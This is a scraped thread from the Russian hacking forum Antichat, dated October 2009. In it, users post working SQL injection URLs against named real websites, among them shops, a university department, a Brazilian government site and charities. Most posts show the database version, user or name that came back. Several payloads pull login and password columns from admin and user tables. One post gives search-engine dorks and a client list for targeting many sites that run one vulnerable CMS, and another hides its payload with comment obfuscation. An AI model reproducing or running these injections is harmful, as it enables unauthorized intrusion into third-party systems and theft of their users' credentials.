ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10881  
Старый 09.10.2009, 16:18
Аватар для TELO
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

Парашютисты
Код HTML:
http://www.skydiver.com.ua/publication/index.php?cat_id=-3%20union%20select%201,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,%2030%20--
skydiver@localhost: skydiver: 4.0.27-log
 
Ответить с цитированием

  #10882  
Старый 09.10.2009, 17:07
Аватар для Zombi ****
Zombi ****
Участник форума
Регистрация: 04.04.2009
Сообщений: 256
Провел на форуме:
3165677

Репутация: 350
Отправить сообщение для Zombi **** с помощью ICQ
По умолчанию

http://www.ksk1.com.ua/news.php?id=-1+union+select+1,2,3,4--

Database Version: 4.1.22-standard-log
Database name: ksk1com_db
User name: ksk1com_db@localhost
 
Ответить с цитированием

  #10883  
Старый 09.10.2009, 19:42
Аватар для Swift
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

Цитата:
http://www.sgg.go.gov.br/agenda_21.php?idMateria=1+and+1=cast((select+versi on())||chr(58)||user+as+int)
PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6:sgg
 
Ответить с цитированием

  #10884  
Старый 09.10.2009, 20:07
Аватар для TELO
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

Магазин одежды 5-я ветка

Код HTML:
http://www.svitstyle.com.ua/index.php?page=-14%20union%20select%201,2,3,concat_ws%28char%2858%29,login,psw%29,5,6%20FROM%20guest%20limit%201,1
Код HTML:
http://www.svitstyle.com.ua/index.php?page=-14%20union%20select%201,2,3,concat_ws%28char%2858%29,uname,upass%29,5,6%20FROM%20users%20limit%201,1
Разные таблы.

Новости Днепропетровска и Украины 5-я ветка
Код HTML:
http://www.prodnepr.dp.ua/news.php3?action=details&news_id=-1335%20union%20select%201,2,login,4,passw+FROM%20job_catvip
 
Ответить с цитированием

  #10885  
Старый 09.10.2009, 21:07
Аватар для 0nep@t0p
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

http://www.swftools.com/
Код:
http://www.swftools.com/tools-category.php?cat=-289'+union+select+1,group_concat(table_name,0x3a,table_schema),3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+'%pas%'--+
http://www.naturistproperty.com/
Код:
http://www.naturistproperty.com/index.php?ac=details&id=86+union+select+1,2,3,4,5,6,concat_ws(0x3a,admin_id,first_name,last_name,email,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+admin--+
http://www.naturistproperty.com/admin
 
Ответить с цитированием

  #10886  
Старый 09.10.2009, 23:56
Аватар для xa-xa89
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394

Репутация: 74
Отправить сообщение для xa-xa89 с помощью ICQ
По умолчанию

EDU
PR7
Код:
http://www.cogsci.ucsd.edu/cmp-general-data-display.php?display=true&what=perspective&id=119+and+1=0+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),6,7,8,9,10+--+-
Database version:5.0.77
Database user: admin@localhost
Database name: cogsci
OS version:redhat-linux-gnu
 
Ответить с цитированием

Уязвимые скрипты сайтов и сервер!!!
  #10887  
Старый 10.10.2009, 12:37
Аватар для toross
toross
Banned
Регистрация: 11.12.2008
Сообщений: 37
Провел на форуме:
178592

Репутация: 35
Отправить сообщение для toross с помощью ICQ
По умолчанию Уязвимые скрипты сайтов и сервер!!!

Вот ОПЯТЬ нашел уязвимый скрипт CMS сайта или галерея картинок что то типо того.

Название CMS: All text and images © copyright Delta Patchwork LLC или что то типо того

Расположение сайтов: https://208.186.168.218:19638/siteadmin/?ocw_login_domain=
все эти уязвимые двиги расположенны на этом серевер!

Находить их можно по запросу в гугле:

Цитата:
Site designed and hosted by GloDerWorks
или

Цитата:
All text and images © copyright Delta Patchwork LLC
Цитата:
4.1.22-log
http://www.tayport.org.uk/photo.php?id=-329+union+select+1,2,3,version(),5--
Цитата:
4.0.27-max-log
http://www.contrastproject.org/photo.php?id=-92+union+select+1,2,3,version(),5,6,7,8,9--
Цитата:
5.0.67
http://www.team-parkinson.org/photo.php?ID=-69+union+select+1,2,3,4,5,6,version(),8,9,10,11--

Цитата:
5.0.45
http://dublin.anglican.org/photo.php?id=-753+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13--
Если Вы хотите похекать все сайты без проблем (тоесть поиска)

Прошу посетить сайт дизайнеров этой кмс, там они выложили всех своих клиентов!

Сайты америки:
http://www.gloderworks.com/USA-portfolio.php

Сайты королевства:
http://www.gloderworks.com/UK-portfolio.php

А да и еще сам сайт дизайнеров тоже уязвим...

ОТ плюсегов неоткажусь

Последний раз редактировалось toross; 10.10.2009 в 13:27..
 
Ответить с цитированием

  #10888  
Старый 10.10.2009, 13:48
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.saratov.ru/gallery/?show=gal&id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase())+--+
User - gallery@localhost
Version - 4.0.17
Database - saratov
 
Ответить с цитированием

  #10889  
Старый 10.10.2009, 14:11
Аватар для L I G A
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

cwas.hinah.com
Код:
http://cwas.hinah.com/interview/?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9+--
user-hinah@192.168.3.152
db-hinah
version-4.0.18-log


'(
 
Ответить с цитированием

  #10890  
Старый 10.10.2009, 14:57
Аватар для [x60]unu
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

ventomir.ru - TC=20
http://www.ventomir.ru/next.php?id=1/**/anD/**/1=2%20/**/uniON/**/seLECT/**/unhex(hex(version()))/*
version - 5.0.32-Debian_7etch8
user - ventomirru@localhost
database - ventomirru
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ